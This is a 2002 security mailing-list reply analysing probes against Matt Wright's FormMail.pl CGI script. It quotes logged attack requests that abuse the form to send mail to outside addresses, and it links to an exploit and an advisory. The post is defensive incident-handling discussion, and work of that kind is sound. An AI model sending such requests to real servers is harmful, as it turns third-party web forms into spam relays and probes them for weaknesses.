Security Incidents mailing list archives
RE: Matt Wright FormMail Attacks
From: Jose Nazario <jose () biocserver BIOC cwru edu>
Date: Mon, 14 Jan 2002 13:19:28 -0500 (EST)
On Mon, 14 Jan 2002, Turner, Keith wrote:
My guess is one of the following: 1) Someone looking to send spam through someone else's webserver. (Seems like that would be very inefficient). 2) Someone looking for a new exploit, maybe testing the waters for a new worm. 3) Someone looking for a way to "forge" emails. make it look like it came from an email address of the affected domain. The email header would go right back to an address in the "forged" domain.
my formail attacks have this general structure: GET /cgi-bin/formmail.pl?email=someone%40aol%2Ecom&subject=hostname%2Edomain%2Ecom%2Fcgi%2Dbin%2Fformail%2Epl&recipient=c0mik%40hotmail%2Ecom&msg=w00t recipients have been: c0mik () hotmail com (msg=w00t) jersyvips () aol com (again, msg=w00t) w00tw00t () yahoo com (yet again, msg=w00t) Heyheyremeberme9 () aol com (msg=w00t) GUILTYBIZ () aol com (msg=w00t) i don't know if any of those accounts are valid. those are just in the past 10,000 lines or so from my error logs (i dont use FormMail.pl). the use of 'w00t' suggests a younger element (w00t is L33T and all), doubtful its just simply spam but rather 'hey, this site's got vulnerable cgi-bin stuff'. spawn an xterm using formmail: http://packetstorm.widexs.nl/0007-exploits/formmail-xploit.pl view env vars using formmail: http://packetstorm.widexs.nl/advisories/blackwatchlabs/BWL-00-06.txt but i did find that others have been seeing this same basic pattern: web logs posted on http://icosym-nt.cvut.cz/musage/A2001-12.txt /cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=icosym%2ecvut%2ecz%2fcgi%2dbin%2fformmail%2epl&recipient=nightauditer%40aol%2ecom&msg=w00t /cgi-bin/formmail.pl?recipient=rmitchell9601 () aol com,&subject=are%20you%20interested%20in%20applying%20your%20skills&email=charresonee () bellsouth net&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl /cgi-bin/formmail.pl?recipient=rmitchell9601 () aol com,&subject=find%20that%20long%20lost%20friend%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.&email=lcordee () bellsouth net&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl http://www.google.com/search?q=cache:L5KlWd3G3D4C:www.kolobrzeg.pl/stats1169/statslog.20011205+formmail+w00t&hl=en 1Cust129.tnt3.richmond.va.da.uu.net - - [05/Dec/2001:00:10:01 +0100] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Ekolobrzeg%2Epl%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=dreads%40aol%2Ecom&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 190 "" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)" etc etc ... formmail + w00t on google brings up a bunch. from a few more lists, more discussion: http://ntbugtraq.net/archive/107/244789 http://citadelle.intrinsec.com/mailing/current/HTML/ml_mobile_code/0487.html hope this helps. its a bit older, and not a highly visible item, but its real. ____________________________ jose nazario jose () cwru edu PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80 PGP key ID 0xFD37F4E5 (pgp.mit.edu) ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- RE: Matt Wright FormMail Attacks Pence, Derek A. (Jan 14)
- Re: Matt Wright FormMail Attacks Brannon (Jan 14)
- Re: Matt Wright FormMail Attacks Markus Stumpf (Jan 15)
- <Possible follow-ups>
- RE: Matt Wright FormMail Attacks Turner, Keith (Jan 14)
- RE: Matt Wright FormMail Attacks Christopher X. Candreva (Jan 14)
- RE: Matt Wright FormMail Attacks Jose Nazario (Jan 14)
- Matt Wright FormMail Attacks Dmitri Smirnov (Jan 14)
- Re: Matt Wright FormMail Attacks Mike Lewinski (Jan 14)
- Re: Matt Wright FormMail Attacks Jose Nazario (Jan 14)
- Re: Matt Wright FormMail Attacks jlewis (Jan 14)
- Re: Matt Wright FormMail Attacks Mike Lewinski (Jan 14)
- Re: Matt Wright FormMail Attacks Michael Hottinger (Jan 15)